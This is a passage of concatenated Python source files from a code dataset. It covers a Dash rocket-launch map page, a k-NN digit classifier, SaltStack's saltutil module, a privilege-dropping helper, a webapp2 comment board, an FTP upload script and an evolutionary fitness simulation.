template_path\n","sub_path":"src/nunavut/jinja/loaders.py","file_name":"loaders.py","file_ext":"py","file_size_in_byte":11243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"120272677","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom datetime import datetime as dt\nimport plotly.graph_objs as go\nimport pandas as pd\nfrom consts import MAPBOX_ACCESS_TOKEN, MAPBOX_STYLE, ROCKETS, LAUNCHES\n\ndef divTemplate(idx, row):\n return html.Div(\n className=\"launch\",\n children=[\n html.Div(\n className=\"top\",\n children=[html.H1(f\"Mission #{idx+1}\" + \": \"+row['mission'])],\n ),\n html.Div(\n className=\"bottom\",\n children=[\n html.Img(src=row['image']),\n html.Div(className=\"text\",\n children=[\n html.Div(\n className=\"info\",\n children=[\n html.P(children=[html.B(children=k.capitalize()), ': '+ str(v)])\n for k, v in row.items()\n if k in ['vehicle', 'time', 'location', 'pad', 'window'] and str(v) != \"nan\"\n ]\n ),\n html.Div(\n className=\"description\",\n children=row['description'],\n )\n ])\n\n ]\n )\n ]\n )\n\ndef mapTemplate(df):\n return go.Figure(\n data=[\n go.Scattermapbox(\n lat=df['lat'].unique(),\n lon=df['long'].unique(),\n mode='markers',\n opacity=0.7,\n marker=dict(\n sizemin=10,\n size=df['same']*3,\n color='limegreen'\n ),\n hoverinfo='text',\n hoverlabel={\"font\": {\"size\": 25,\n \"family\":\"Lucida Console\",\n \"color\":\"black\"}\n },\n text=df['location'].unique(),\n )],\n layout=go.Layout(\n hovermode='closest',\n paper_bgcolor=\"rgb(0, 31, 31)\",\n margin=go.layout.Margin(\n l=10,\n r=10,\n b=0,\n t=0,\n pad=8\n ),\n mapbox=dict(\n accesstoken=MAPBOX_ACCESS_TOKEN,\n style=MAPBOX_STYLE,\n bearing=0,\n center=dict(\n lat=45,\n lon=-73\n ),\n pitch=0,\n zoom=2\n )\n )\n )\n\ndef render_rocket(idx, row):\n if pd.isnull(row.values).any():\n return ''\n return html.Div(\n className=\"rocketinfo\",\n children=[\n html.Div(\n className=\"top\",\n children=[html.H1(f\"Rocket #{int(idx+1)}\" + \": \"+row['Rocket'])],\n ),\n html.Div(\n className=\"bottom\",\n children=[\n html.Img(src=row[\"Photo\"]),\n html.Div(\n className=\"text\",\n children=[\n html.P(children=[html.B(children=k), ': '+ str(v)])\n for k, v in row.items()\n if k in ['Company', 'Country'] and str(v).lower() != \"nan\"\n ]+[html.P(children=[html.B(\"Site\"), ': ', html.A(row[\"Site\"], href=row[\"Site\"])])]\n )\n ]\n )\n ]\n )\n\nROCKETS_PAGE = [html.Div(\n html.H1(\"Rockets list\", className=\"title\")\n)]+[render_rocket(index, row) for index, row in ROCKETS.iterrows()]\n\nINDEX_PAGE = [\n dcc.Link('Home', href='/home'),\n html.Br(),\n dcc.Link('Rockets', href='/rockets')\n]\n\nMAIN_PAGE = [\n dcc.Link('Rockets', id='rockets', className='ref', href='/rockets'),\n html.A(href=\"https://clever-boyd-6ef0a3.netlify.com/\",\n className='ref',\n children=\"Info\"),\n html.H1(id='name', children='LAUNCH.IO'),\n html.Div(id='Timer',children='0'),\n html.Div(id='next_launch'),\n html.Div(\n dcc.DatePickerRange(\n id='date_picker',\n min_date_allowed=dt(2000, 1, 1),\n max_date_allowed=dt(3000, 12, 31),\n initial_visible_month=dt(2019, 1, 1),\n start_date=dt(2019, 1, 1),\n end_date=dt(2019, 2, 1)\n ),\n id='date_range'\n ),\n html.Div([\n dcc.Graph(\n id='map',\n figure=mapTemplate(LAUNCHES),\n config={'displayModeBar': False}\n )\n ]),\n html.Div(\n dcc.Interval(\n id='interval-component',\n interval=1000,\n n_intervals=0\n )\n ),\n html.Div([\n dcc.Tabs(id=\"tabs\", className=\"tabs\", value='tab-2', children=[\n dcc.Tab(label='This location', value='tab-1', className='tab', selected_className=\"tab-selected\"),\n dcc.Tab(label='ALL', value='tab-2', className='tab', selected_className=\"tab-selected\"),\n ]),\n html.Div(\n id='rocket',\n children=[divTemplate(index, row) for index, row in LAUNCHES.iterrows()]\n )\n ])\n]\n\nif __name__ == '__main__':\n print()\n","sub_path":"pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":5289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"154663566","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon May 21 21:45:18 2018\r\n\r\n@author: sanjeet\r\n\"\"\"\r\n\r\nfrom sklearn import datasets\r\nimport numpy as np \r\nimport matplotlib.pyplot as plt\r\ndata = datasets.load_digits()\r\nk = 5\r\ntrain_label = data.target[0:1258]\r\ntest_label = data.target[1259:1787]\r\n\r\ntrain_set = data.images[0:1258]\r\ntest_set = data.images[1259:1787]\r\n\r\ntrain = np.zeros((1258,64))\r\ntest = np.zeros((528,64))\r\n\r\n#flatten the train images of size 8*8 into 64 each\r\nfor i in range(len(train)):\r\n train[i] = train_set[i].flatten()\r\n \r\n#flatten the test images of size 8*8 into 64 each\r\nfor i in range(len(test)):\r\n test[i] = test_set[i].flatten()\r\n \r\ndist = np.zeros((528,1258))\r\n\r\ndef distance_calculate(test,train):\r\n for i in range(len(test)):\r\n for j in range(len(train)):\r\n dist[i][j]= np.sqrt(np.sum((test[i] - train[j]) ** 2))\r\n \r\n return dist\r\n\r\n#distance of each 528 test with each of 1258 train records\r\ndist_matrix = distance_calculate(test,train)\r\n\r\n#make a dictionary which will contain all distances as key and class as their corresponding value\r\n#then we will sort that dictonary based on the key i.e distance and choose the first k element and \r\n#check most prominent class and assign that class to that test says test_lebel_predict\r\nimport operator\r\nm={}\r\ntest_label_output = np.zeros((528,))\r\nfor i in range(dist_matrix.shape[0]):\r\n m = dict(zip(dist_matrix[i], train_label))\r\n m = sorted(m.items(),key=operator.itemgetter(0))\r\n track ={}\r\n for key,value in m:\r\n if value not in track:\r\n track[value]=1\r\n else:\r\n track[value]+=1\r\n \r\n test_label_output[i] = max(track,key = track.get)\r\n \r\n#Testing the accuracy using the all the test data set\r\n\r\nres = test_label - test_label_output\r\ncount_similar=0\r\nfor item in res:\r\n if(item == 0.0):\r\n count_similar+=1\r\n \r\naccuracy = count_similar*100/(len(test_label))\r\nprint(\"Accuracy :\",accuracy)","sub_path":"Machine Learning Algorithms/K-Nearest-Neighbour-Algorithm/K-NN.py","file_name":"K-NN.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"500638398","text":"# -*- coding: utf-8 -*-\n'''\nThe Saltutil module is used to manage the state of the salt minion itself. It is used to manage minion modules as well as automate updates to the salt minion.\n\n:depends: - esky Python module for update functionality\n'''\n\n# Import python libs\nimport os\nimport hashlib\nimport shutil\nimport signal\nimport logging\nimport fnmatch\nimport time\nimport sys\n\n# Import salt libs\nimport salt.payload\nimport salt.state\nimport salt.client\nimport salt.utils\nimport salt.transport\nfrom salt.exceptions import SaltReqTimeoutError\nfrom salt._compat import string_types\n\n# Import third party libs\ntry:\n import esky\n HAS_ESKY = True\nexcept ImportError:\n HAS_ESKY = False\n\nlog = logging.getLogger(__name__)\n\n\ndef _sync(form, saltenv=None):\n '''\n Sync the given directory in the given environment\n '''\n if saltenv is None:\n # No environment passed, detect them based on gathering the top files\n # from the master\n saltenv = 'base'\n st_ = salt.state.HighState(__opts__)\n top = st_.get_top()\n if top:\n saltenv = st_.top_matches(top).keys()\n if isinstance(saltenv, string_types):\n saltenv = saltenv.split(',')\n ret = []\n remote = set()\n source = os.path.join('salt://_{0}'.format(form))\n mod_dir = os.path.join(__opts__['extension_modules'], '{0}'.format(form))\n if not os.path.isdir(mod_dir):\n log.info('Creating module dir {0!r}'.format(mod_dir))\n os.makedirs(mod_dir)\n for sub_env in saltenv:\n log.info('Syncing {0} for environment {1!r}'.format(form, sub_env))\n cache = []\n log.info('Loading cache from {0}, for {1})'.format(source, sub_env))\n cache.extend(__salt__['cp.cache_dir'](source, sub_env))\n local_cache_dir = os.path.join(\n __opts__['cachedir'],\n 'files',\n sub_env,\n '_{0}'.format(form)\n )\n log.debug('Local cache dir: {0!r}'.format(local_cache_dir))\n for fn_ in cache:\n if __opts__.get('file_client', '') == 'local':\n for fn_root in __opts__['file_roots'].get(sub_env, []):\n if fn_.startswith(fn_root):\n relpath = os.path.relpath(fn_, fn_root)\n relpath = relpath[relpath.index('/') + 1:]\n relname = os.path.splitext(relpath)[0].replace(\n os.sep,\n '.')\n remote.add(relpath)\n dest = os.path.join(mod_dir, relpath)\n else:\n relpath = os.path.relpath(fn_, local_cache_dir)\n relname = os.path.splitext(relpath)[0].replace(os.sep, '.')\n remote.add(relpath)\n dest = os.path.join(mod_dir, relpath)\n log.info('Copying {0!r} to {1!r}'.format(fn_, dest))\n if os.path.isfile(dest):\n # The file is present, if the sum differs replace it\n srch = hashlib.md5(\n salt.utils.fopen(fn_, 'r').read()\n ).hexdigest()\n dsth = hashlib.md5(\n salt.utils.fopen(dest, 'r').read()\n ).hexdigest()\n if srch != dsth:\n # The downloaded file differs, replace!\n shutil.copyfile(fn_, dest)\n ret.append('{0}.{1}'.format(form, relname))\n else:\n dest_dir = os.path.dirname(dest)\n if not os.path.isdir(dest_dir):\n os.makedirs(dest_dir)\n shutil.copyfile(fn_, dest)\n ret.append('{0}.{1}'.format(form, relname))\n\n touched = bool(ret)\n if __opts__.get('clean_dynamic_modules', True):\n current = set(_listdir_recursively(mod_dir))\n for fn_ in current - remote:\n full = os.path.join(mod_dir, fn_)\n if os.path.isfile(full):\n touched = True\n os.remove(full)\n #cleanup empty dirs\n while True:\n emptydirs = _list_emptydirs(mod_dir)\n if not emptydirs:\n break\n for emptydir in emptydirs:\n touched = True\n os.rmdir(emptydir)\n #dest mod_dir is touched? trigger reload if requested\n if touched:\n mod_file = os.path.join(__opts__['cachedir'], 'module_refresh')\n with salt.utils.fopen(mod_file, 'a+') as ofile:\n ofile.write('')\n return ret\n\n\ndef _listdir_recursively(rootdir):\n file_list = []\n for root, dirs, files in os.walk(rootdir):\n for filename in files:\n relpath = os.path.relpath(root, rootdir).strip('.')\n file_list.append(os.path.join(relpath, filename))\n return file_list\n\n\ndef _list_emptydirs(rootdir):\n emptydirs = []\n for root, dirs, files in os.walk(rootdir):\n if not files and not dirs:\n emptydirs.append(root)\n return emptydirs\n\n\ndef update(version=None):\n '''\n Update the salt minion from the URL defined in opts['update_url']\n\n\n This feature requires the minion to be running a bdist_esky build.\n\n The version number is optional and will default to the most recent version\n available at opts['update_url'].\n\n Returns details about the transaction upon completion.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.update 0.10.3\n '''\n if not HAS_ESKY:\n return 'Esky not available as import'\n if not getattr(sys, 'frozen', False):\n return 'Minion is not running an Esky build'\n if not __salt__['config.option']('update_url'):\n return '\"update_url\" not configured on this minion'\n app = esky.Esky(sys.executable, __opts__['update_url'])\n oldversion = __grains__['saltversion']\n try:\n if not version:\n version = app.find_update()\n if not version:\n return 'No updates available'\n app.fetch_version(version)\n app.install_version(version)\n app.cleanup()\n except Exception as err:\n return err\n restarted = {}\n for service in __opts__['update_restart_services']:\n restarted[service] = __salt__['service.restart'](service)\n return {'comment': 'Updated from {0} to {1}'.format(oldversion, version),\n 'restarted': restarted}\n\n\ndef sync_modules(saltenv=None, refresh=True):\n '''\n Sync the modules from the _modules directory on the salt master file\n server. This function is environment aware, pass the desired environment\n to grab the contents of the _modules directory, base is the default\n environment.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.sync_modules\n '''\n ret = _sync('modules', saltenv)\n if refresh:\n refresh_modules()\n return ret\n\n\ndef sync_states(saltenv=None, refresh=True):\n '''\n Sync the states from the _states directory on the salt master file\n server. This function is environment aware, pass the desired environment\n to grab the contents of the _states directory, base is the default\n environment.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.sync_states\n '''\n ret = _sync('states', saltenv)\n if refresh:\n refresh_modules()\n return ret\n\n\ndef sync_grains(saltenv=None, refresh=True):\n '''\n Sync the grains from the _grains directory on the salt master file\n server. This function is environment aware, pass the desired environment\n to grab the contents of the _grains directory, base is the default\n environment.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.sync_grains\n '''\n ret = _sync('grains', saltenv)\n if refresh:\n refresh_modules()\n refresh_pillar()\n return ret\n\n\ndef sync_renderers(saltenv=None, refresh=True):\n '''\n Sync the renderers from the _renderers directory on the salt master file\n server. This function is environment aware, pass the desired environment\n to grab the contents of the _renderers directory, base is the default\n environment.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.sync_renderers\n '''\n ret = _sync('renderers', saltenv)\n if refresh:\n refresh_modules()\n return ret\n\n\ndef sync_returners(saltenv=None, refresh=True):\n '''\n Sync the returners from the _returners directory on the salt master file\n server. This function is environment aware, pass the desired environment\n to grab the contents of the _returners directory, base is the default\n environment.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.sync_returners\n '''\n ret = _sync('returners', saltenv)\n if refresh:\n refresh_modules()\n return ret\n\n\ndef sync_outputters(saltenv=None, refresh=True):\n '''\n Sync the outputters from the _outputters directory on the salt master file\n server. This function is environment aware, pass the desired environment\n to grab the contents of the _outputters directory, base is the default\n environment.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.sync_outputters\n '''\n ret = _sync('outputters', saltenv)\n if refresh:\n refresh_modules()\n return ret\n\n\ndef sync_all(saltenv=None, refresh=True):\n '''\n Sync down all of the dynamic modules from the file server for a specific\n environment\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.sync_all\n '''\n log.debug('Syncing all')\n ret = {}\n ret['modules'] = sync_modules(saltenv, False)\n ret['states'] = sync_states(saltenv, False)\n ret['grains'] = sync_grains(saltenv, False)\n ret['renderers'] = sync_renderers(saltenv, False)\n ret['returners'] = sync_returners(saltenv, False)\n ret['outputters'] = sync_outputters(saltenv, False)\n if refresh:\n refresh_modules()\n return ret\n\n\ndef refresh_pillar():\n '''\n Signal the minion to refresh the pillar data.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.refresh_pillar\n '''\n __salt__['event.fire']({}, 'pillar_refresh')\n\n\ndef refresh_modules():\n '''\n Signal the minion to refresh the module and grain data\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.refresh_modules\n '''\n __salt__['event.fire']({}, 'module_refresh')\n\n\ndef is_running(fun):\n '''\n If the named function is running return the data associated with it/them.\n The argument can be a glob\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.is_running state.highstate\n '''\n run = running()\n ret = []\n for data in run:\n if fnmatch.fnmatch(data.get('fun', ''), fun):\n ret.append(data)\n return ret\n\n\ndef running():\n '''\n Return the data on all running salt processes on the minion\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.running\n '''\n\n ret = []\n serial = salt.payload.Serial(__opts__)\n pid = os.getpid()\n proc_dir = os.path.join(__opts__['cachedir'], 'proc')\n if not os.path.isdir(proc_dir):\n return []\n for fn_ in os.listdir(proc_dir):\n path = os.path.join(proc_dir, fn_)\n with salt.utils.fopen(path, 'rb') as fp_:\n buf = fp_.read()\n fp_.close()\n if buf:\n data = serial.loads(buf)\n else:\n # Proc file is empty, remove\n os.remove(path)\n continue\n if not isinstance(data, dict):\n # Invalid serial object\n continue\n if not salt.utils.process.os_is_running(data['pid']):\n # The process is no longer running, clear out the file and\n # continue\n os.remove(path)\n continue\n if data.get('pid') == pid:\n continue\n ret.append(data)\n return ret\n\n\ndef find_job(jid):\n '''\n Return the data for a specific job id\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.find_job \n '''\n for data in running():\n if data['jid'] == jid:\n return data\n return {}\n\n\ndef signal_job(jid, sig):\n '''\n Sends a signal to the named salt job's process\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.signal_job 15\n '''\n for data in running():\n if data['jid'] == jid:\n try:\n os.kill(int(data['pid']), sig)\n return 'Signal {0} sent to job {1} at pid {2}'.format(\n int(sig),\n jid,\n data['pid']\n )\n except OSError:\n path = os.path.join(__opts__['cachedir'], 'proc', str(jid))\n if os.path.isfile(path):\n os.remove(path)\n return ('Job {0} was not running and job data has been '\n ' cleaned up').format(jid)\n return ''\n\n\ndef term_job(jid):\n '''\n Sends a termination signal (SIGTERM 15) to the named salt job's process\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.term_job \n '''\n return signal_job(jid, signal.SIGTERM)\n\n\ndef kill_job(jid):\n '''\n Sends a kill signal (SIGKILL 9) to the named salt job's process\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.kill_job \n '''\n return signal_job(jid, signal.SIGKILL)\n\n\ndef regen_keys():\n '''\n Used to regenerate the minion keys.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.regen_keys\n '''\n for fn_ in os.listdir(__opts__['pki_dir']):\n path = os.path.join(__opts__['pki_dir'], fn_)\n try:\n os.remove(path)\n except os.error:\n pass\n time.sleep(60)\n sreq = salt.payload.SREQ(__opts__['master_uri'])\n auth = salt.crypt.SAuth(__opts__)\n\n\ndef revoke_auth():\n '''\n The minion sends a request to the master to revoke its own key.\n Note that the minion session will be revoked and the minion may\n not be able to return the result of this command back to the master.\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.revoke_auth\n '''\n # sreq = salt.payload.SREQ(__opts__['master_uri'])\n auth = salt.crypt.SAuth(__opts__)\n tok = auth.gen_token('salt')\n load = {'cmd': 'revoke_auth',\n 'id': __opts__['id'],\n 'tok': tok}\n\n sreq = salt.transport.Channel.factory(__opts__)\n try:\n sreq.send(load)\n # return auth.crypticle.loads(\n # sreq.send('aes', auth.crypticle.dumps(load), 1))\n except SaltReqTimeoutError:\n return False\n return False\n\n\ndef cmd(tgt,\n fun,\n arg=(),\n timeout=None,\n expr_form='glob',\n ret='',\n kwarg=None,\n ssh=False,\n **kwargs):\n '''\n Assuming this minion is a master, execute a salt command\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.cmd\n '''\n if ssh:\n client = salt.client.SSHClient(__opts__['conf_file'])\n else:\n client = salt.client.LocalClient(__opts__['conf_file'])\n ret = {}\n for ret_comp in client.cmd_iter(\n tgt,\n fun,\n arg,\n timeout,\n expr_form,\n ret,\n kwarg,\n **kwargs):\n ret.update(ret_comp)\n return ret\n\n\ndef cmd_iter(tgt,\n fun,\n arg=(),\n timeout=None,\n expr_form='glob',\n ret='',\n kwarg=None,\n ssh=False,\n **kwargs):\n '''\n Assuming this minion is a master, execute a salt command\n\n CLI Example:\n\n .. code-block:: bash\n\n salt '*' saltutil.cmd\n '''\n if ssh:\n client = salt.client.SSHClient(__opts__['conf_file'])\n else:\n client = salt.client.LocalClient(__opts__['conf_file'])\n for ret in client.cmd_iter(\n tgt,\n fun,\n arg,\n timeout,\n expr_form,\n ret,\n kwarg,\n **kwargs):\n yield ret\n","sub_path":"sources/salt/modules/saltutil.py","file_name":"saltutil.py","file_ext":"py","file_size_in_byte":16189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"299236388","text":"\"\"\"hoard.utils - A utility module used for\nmethods and features that do not belong in\ntheir own module.\"\"\"\n\nimport os\nimport sys\nimport grp\nimport pwd\nimport random\nimport signal\n\nfrom tornado.options import options\nimport setproctitle\n\nfrom hoard.log import log\n\n\ndef setgid():\n \"\"\"\n Change our existing group.\n\n Used to drop from root privileges down to a less\n privileged group.\n\n MUST be called BEFORE setuid, not after.\n \"\"\"\n try:\n os.setgid(grp.getgrnam(options.group).gr_gid)\n except KeyError:\n log.error(\"Group '%s' does not exist\" % options.group)\n sys.exit(1)\n except OSError:\n log.error(\"You do not have permission to switch to group '%s'\"\n % options.group)\n sys.exit(1)\n\n\ndef setuid():\n \"\"\"\n Change our existing user.\n\n Used to drop from root privileges down to a less\n privileged user\n\n MUST be called AFTER setgid, not before.\n \"\"\"\n try:\n os.setuid(pwd.getpwnam(options.user).pw_uid)\n except KeyError:\n log.error(\"User '%s' does not exist\" % options.user)\n sys.exit(1)\n except OSError:\n log.error(\"You do not have permission to switch to user '%s'\"\n % options.user)\n sys.exit(1)\n\n\ndef terminate(signum, frame):\n \"\"\"\n Terminate the parent process and send signals\n to shut down it's children\n\n Iterates over the child pids in the frame\n and sends the SIGTERM signal to shut them\n down.\n \"\"\"\n try:\n for pid in frame.f_locals['children'].keys():\n os.kill(pid, signal.SIGTERM)\n except KeyError:\n # not the parent\n pass\n if os.path.exists(options.pid):\n os.remove(options.pid)\n sys.exit(0)\n\n\ndef set_process_title():\n \"\"\"\n Set the title of the process.\n\n If the process is the master, set\n a master title, otherwise set\n worker.\n \"\"\"\n if os.path.exists(options.pid):\n pid = int(file(options.pid, 'r').read().strip())\n if pid == os.getpid():\n setproctitle.setproctitle(\"hoard: master\")\n else:\n setproctitle.setproctitle(\"hoard: worker\")\n\n\ndef email_id():\n \"\"\"\n Generate an HEX ID to assign to each\n connection.\n\n Will be reused later down the line\n due to the limited number of characters.\n \"\"\"\n alpha = list(\"1234567890ABCDEF\")\n return ''.join(random.choice(alpha) for x in range(10))\n","sub_path":"nectar/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"194543930","text":"import itertools\nfrom itertools import combinations_with_replacement\n\n\ndef get_indices_of_item_weights(weights, length, limit):\n \"\"\"\n YOUR CODE HERE\n \"\"\"\n # Your code here\n\n # feeding 3 variables, weights: an array of weights, \n # length : length of array, \n # limit: what any 2 numbers should add up to \n \n \n result = []\n result2 = []\n result3 = []\n result4 = []\n result5 = [1,0]\n \n \n # First case, if length is 1 or less, return None\n if length <2:\n return None\n \n # Here I create a dictionary, using the values of the weights as keys, \n # and the index of the weights as values\n for x,v in enumerate(weights):\n result2.append(v)\n result3.append(x)\n\n d = {key:value for key, value in zip(result2, result3)}\n\n #Now I scroll through the weights, and see if the limit, or target minus one of the values,\n # is equal to another value, if so , I append these values to a list, and reverse order\n # so that higher value is first\n for x in weights:\n for y in weights:\n if (limit-x) == y:\n result = [x,y]\n result.sort(reverse=True) \n \n # Another fringe case, where they are asking to return index 1, and 0 if elements in result which add up\n # to the limit are the same, so in this case, i check indexes of result, if they are the same, i simply return \n # result5, which is a [1,0] array\n \n for i, j in enumerate(result[:-1]):\n if j == result[i+1]: \n return result5 \n \n # Otherwise, in all other cases,\n # I scroll through the values in the result array, check if the key in the dictionary is equal to the value,\n # if so, append the key to result4, and return result 4\n for x in result:\n for k,v in d.items():\n if k == x:\n result4.append(v)\n\n return result4 \n\n\n","sub_path":"hashtables/ex1/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"246543111","text":"import jinja2\nimport webapp2\nimport os\nfrom google.appengine.ext import ndb\n\nJINJA_ENVIRONMENT = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),\n extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\nclass CommentEntry(ndb.Model):\n \"\"\"A main model for representing an individual Comment entry.\"\"\"\n username = ndb.StringProperty(indexed=False)\n comment = ndb.StringProperty(indexed=False)\n date = ndb.DateTimeProperty(auto_now_add=True)\n\nclass MainPage(webapp2.RequestHandler):\n def get(self):\n comments = CommentEntry.query().order(-CommentEntry.date).fetch(20)\n template_values = {\n 'comments': comments\n }\n template = JINJA_ENVIRONMENT.get_template('main.html')\n self.response.write(template.render(template_values))\n\n def post(self):\n username_entered = self.request.get('username')\n comment_entered = self.request.get('comment')\n if self.valid_username(username_entered) and self.valid_comment(comment_entered):\n entry = CommentEntry(username = username_entered, comment = comment_entered)\n entry.put()\n self.redirect('/')\n else:\n template_values = {\n 'error': 'Username or comment are not valid!',\n 'username': username_entered,\n 'comment': comment_entered\n }\n template = JINJA_ENVIRONMENT.get_template('main.html')\n self.response.write(template.render(template_values))\n\n def valid_username(self, s):\n m = len(s)\n if m > 1 and m < 15:\n return True\n else:\n return False\n\n def valid_comment(self, s):\n m = len(s)\n if m > 5 and m < 1000:\n return True\n else:\n return False\n\n\n\n\napp = webapp2.WSGIApplication([\n ('/', MainPage), \n], debug=True)\n","sub_path":"mywebapp.py","file_name":"mywebapp.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"637714455","text":"import unittest\nimport os\n\n\ndef all_tests():\n suite = unittest.TestLoader.discover(\n start_dir=os.path.dirname(__file__),\n pattern='test_*.py',\n top_level_dir=None\n )\n return suite\n\n\ndef run():\n unittest.TextTestRunner(verbosity=2).run(all_tests())\n\n\nif __name__ == '__main__':\n run()\n","sub_path":"testCase/allTest.py","file_name":"allTest.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"62826769","text":"import ftplib\nimport os\n\nftp = ftplib.FTP('129.9.0.102', 'root', 'Test1234.') # FTP Connection information\nftp.dir() # Run \"dir\" command in current folder - cfcard:\nprint(\"..............1............................\")\n# ftp.mkd('newfile3') # Create new directory\n\n# ftp.cwd(\"logfile\") # Change directory\n# ftp.dir() # Run \"dir\" command in current folder - cfcard:/logfile\n# ftp.delete(\"umut3.cfg\") # Delete a file\n# ftp.rmd(\"newfile3\") # Delete a folder\n\nupload = open(\"Device_List.txt\", 'rb') # Choose file in local to upload\nftp.storbinary('STOR %s' % os.path.basename(\"Device_Lis12t.txt\"), upload, 1024) # File upload from PC to device\n","sub_path":"ftp-connection.py","file_name":"ftp-connection.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"583888868","text":"from __future__ import print_function, division\nimport numpy, time, csv\nimport matplotlib.pyplot as plt\nimport scipy.stats.mstats\n\n#INITIALIZATIONS\n\nstart_time = time.time()\npopn = 1000\nlocii = 10\ntotal_gen = 150000\ngenerations = list(range(1, (total_gen+1)))\n\nref_types = []\n\nfor i in range(2**locii): #populating reference array of reference genotypes and epigenotypes\n binaryRepresentation = list(format(i, 'b'))\n finalRepresentation = [['0']*(locii-len(binaryRepresentation)) + binaryRepresentation]\n ref_types = ref_types + finalRepresentation\n\nref_types =[[int(j) for j in i] for i in ref_types] #converting the string to int in the refernce array\n\ndef partition(number, part):\n q1, r1 = divmod(number, part)\n indices = [q1 * i + min(i, r1) for i in xrange(part + 1)]\n lens = [indices[i + 1] - indices[i] for i in range(part)]\n return lens\n\t\ndef mutation(allele,freq): #defining mutation function\n temp = numpy.random.rand()\n if temp < freq:\n return(int(not(allele)))\n else:\n return(allele)\n\ndef individual_cycle(gef, offspring, locii, gfitnessref,efitnessref, ref_types): \n \n gef_transient = [gef]*offspring #generating transient offspring of an indivdual\n\n for i1 in range(offspring): \n for i2 in range(2): # (0 - genome, 1 - epigenome , 2 - fitness)\n for i3 in range(locii): #iterating through locii\n\n if i2 == 0: #mutation of genome\n gef_transient[i1][i2][i3] = mutation(gef_transient[i1][i2][i3], 10**-6)\n\n if i2 == 1:#mutation of epigenome\n gef_transient[i1][i2][i3] = mutation(gef_transient[i1][i2][i3], 10**-4)\n\t\t\t\n w_g = gfitnessref[ref_types.index(gef_transient[i1][0])] #to compare genotype of individual to reference genotypes and get the genetic fitness\n w_e = efitnessref[ref_types.index(gef_transient[i1][1])] #to compare epigenotype of individual to reference epigenotypes and get the epigenetic fitness\n gef_transient[i1][2] = max(w_g, w_e)\n \n return gef_transient #array of kids of the individual and their genome, epigenome, fitnesses\n\ndef iterations(num, gef_small, offspring_small,locii,gfitnessref,efitnessref, ref_types):\n return sum([individual_cycle(gef_small[indiv], offspring_small[indiv],locii,gfitnessref,efitnessref, ref_types) for indiv in range(num)],[])\n\n# ******FOR PARALLEL PROCESSING ************************\nimport pp\nppservers = ()\nncpus = 8\njob_server = pp.Server(ncpus, ppservers=ppservers)\ncores = job_server.get_ncpus() # number of cores/workers being used\ninputs = partition(popn, cores) # Job distribution to each cores\n\n# --------------------------------------------------------\n\t\t\navg_w = [] #will have the average fitness of each geenration\n\n#CREATING the fitness landscape for this replication\ngfitnessref = [0.1 for i in range((2**locii)-1)] + [1.5]#populating reference arrays of FITNESSES of genotpes and epigenotypes by using binary scheme\ngfitnessref[682] = 1.5\nefitnessref = [0.1 for i in range((2**locii)-1)] + [1.5]\nefitnessref[682] = 1.5\n\n#populating gef array of first generation of this replication with monomorphic genome, epigenome, and the correspong fitness (0.1, in this case)\ngef = [[[0]*locii, [0]*locii, 0.1] for i in range(popn)]\n\nfor count in range(total_gen): #LOOP FOR A GENERATIONS WITHIN A SINGLE REPLICATION\n\n #SCALING THE FITNESSES AND GETTING ARRAY OF OFFSPRING NUMBER\n w_array = [gef[i][2] for i in range(popn)] #populating an array with only the fitnesses of the individuals\n fitness_sum = sum(w_array)\n avg_w += [fitness_sum/popn] #appending to an array of average fitnesses of each generation\n scaling_factor = 1 / fitness_sum # calculating scaling factor for fitness\n w_scaled = list(map(lambda x: x*scaling_factor, w_array)) #multiplying each fitness by the scaling factor to update this population fitness array for this generation to use in multinomial function\n offspring = numpy.random.multinomial(popn, w_scaled) #generating number of offspring of every individual\n\n #gef_megatransient=iterations(popn,gef, offspring)\n #parallelisation code - to run individual_cycle on parts of the gef array, which are groups of individuals distributed to the cores\n job1 = [job_server.submit(iterations, (input, 